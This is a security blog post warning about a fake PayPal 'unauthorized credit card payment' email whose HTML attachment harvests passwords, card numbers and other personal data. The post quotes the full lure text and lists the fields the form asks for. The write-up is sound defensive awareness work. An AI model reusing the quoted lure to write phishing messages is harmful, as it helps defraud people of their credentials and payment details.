A look at a double-dipping advertising network

PayPal “Unauthorized Credit Card Payment” Phish

A fake PayPal email, addressed “Dear PayPal”, with an attachment to fill in? What could possibly go wrong?

Fake mail

The email reads as follows:

Dear PayPal user,

We recently received a report of unauthorized credit card payment attempt associated with this account. To protect you against any further unauthorised payment attempts, we’ve limited access to your PayPal account. Please take a minute to review the details below and what steps you need to take to remove the limits.

———————————– Details of disputed transaction ———————————– Case ID Number: PP-001-546-712-049 ———————————– What to do next ———————————–

Please download the form attached to this email and open it in a web browser. Once opened, you will be provided with steps to restore your account access. We appreciate your understanding as we work to ensure your account safety.

———————————– Due dates ———————————– Please get back to us as soon as possible. ———————————– Other details ———————————– There are no other details for this transaction at this time.

Yours sincerely, PayPal

Just like the spam from mid-February, this one comes with a zipped attachment:

Case ID Number PP-001-546-712-049

with a .html file inside called…well, you can probably guess what it’s called:

Case ID Number PP-001-546-712-049.html

html attachment

The form asks for:

Email address, full name, PayPal password, DOB, billing address / town, county, postcode, home phone, credit / debit card number, expiry date, security code and sort code.

Of course, you shouldn’t fill this in or hit the “Send” button – just delete the attachment and send the mail to the spam folder.

No doubt these scammers will be back with a fresh ploy in the near future but for now, this one will hopefully have a low success rate.

Christopher Boyd


Christopher Boyd

Former Director of Research at FaceTime Security Labs. He has a very particular set of skills. Skills that make him a nightmare for threats like you.